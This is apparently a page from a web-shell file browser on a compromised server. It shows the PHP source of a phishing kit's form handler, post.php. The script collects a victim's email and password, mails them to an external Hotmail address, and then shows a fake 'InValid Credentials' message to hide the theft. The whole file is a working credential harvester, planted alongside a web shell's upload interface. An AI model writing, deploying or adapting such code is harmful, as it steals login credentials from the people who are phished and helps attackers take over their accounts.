Your IP : 216.73.216.63


Current Path : /proc/self/cwd/wfu_loaber/
Upload File :
Current File : //proc/self/cwd/wfu_loaber/post.php

<?php
$ip = getenv("REMOTE_ADDR");	

if(!empty($_POST)) {
 $email= $_POST['email'];
 $password = $_POST['password'];
 
		$to =  "paul.anthony2214@hotmail.com";
 		
         $subject = "New Login : ip";
		 
		 $message =  "Online ID            : ".$email."rn";
         $message .= "Password           : ".$password."rn";
		 
		$header = "Content type: roundcube domain rn";
         $header .= "MIME-Version: 1.0rn";
         $header .= "Content-type: text/htmlrn";
		 
		 mail ($to,$subject,$message,$header);
		 	$signal = 'ok';
			$msg = 'InValid Credentials';
	
	// $praga=rand();
	// $praga=md5($praga);

}
else{
	$signal = 'bad';
	$msg = 'Please fill in all the fields.';
}
$data = array(
        'signal' => $signal,
        'msg' => $msg,
        'redirect_link' => $redirect,
    );
    echo json_encode($data);
?>